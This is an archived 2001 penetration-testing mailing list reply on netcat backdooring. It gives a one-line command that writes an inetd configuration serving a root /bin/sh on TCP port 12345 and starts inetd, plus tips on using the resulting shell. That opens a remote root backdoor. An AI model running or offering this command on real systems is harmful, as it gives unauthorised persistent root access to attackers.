Penetration Testing mailing list archives

Re: [PEN-TEST] nc backdooring

From: Robert van der Meulen <rvdm () CISTRON NL>
Date: Thu, 25 Jan 2001 19:36:30 +0100

Hi,

Quoting starlink (starlink () AMAZON COM BR):
The question is: How can I can the output of the remote execution back? Is
there nicer way of doing this with netcat?
echo "12345 tcp stream nowait root /bin/sh /bin/sh" > /tmp/inetd.tmp &&
/sbin/inetd /tmp/inetd.tmp

Will start a shell on '12345'. Be sure to append a ';' after each
line/command typed. You won't have job control, and interactive stuff will
behave weirdly sometimes.

Greets,
        Robert
--
                              Linux Generation
              "Cleveland? Yes, I spent a week there one day."